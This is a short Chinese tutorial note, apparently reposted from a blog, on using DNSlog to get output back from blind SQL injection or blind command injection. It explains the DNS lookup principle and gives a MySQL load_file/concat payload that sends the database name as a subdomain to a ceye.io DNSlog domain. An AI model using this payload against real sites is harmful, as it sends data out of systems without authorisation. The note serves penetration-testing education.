利用DNS在解析时会留下有用的日志
使用条件
1.有sql盲注(或时间)注入的站点,可以用sqlmap或手工注入需要频繁请求,最后导致被ban ip时
2.发现疑似命令注入的洞,但是目标站点不显示,无法确定是否真的有洞
3.目标不让信息回显,但是如果能发送请求,那么就可以尝试DNS--用DNSlog来获取回显(一般为root权限)
原理:
把域名dns指向我们服务器域名,这样的话解析域名的时候就会向我们的dns服务器上面进行查询,从而可以获取数据库上信息等.
在mysql中payload常为:
load_file(concat(‘\\\\‘,(select database()),‘.xxxx.ceye.io‘))
其中load_file()函数
load_file是用来读取文件的,返回文件内容为字符串(需要root权限)
但也可用于发送dns请求
concat()为字符串连接函数
(select database())-->为注入查询的位置
‘.xxxx.ceye.io‘为平台域名
原文:https://www.cnblogs.com/ly2333/p/13682072.html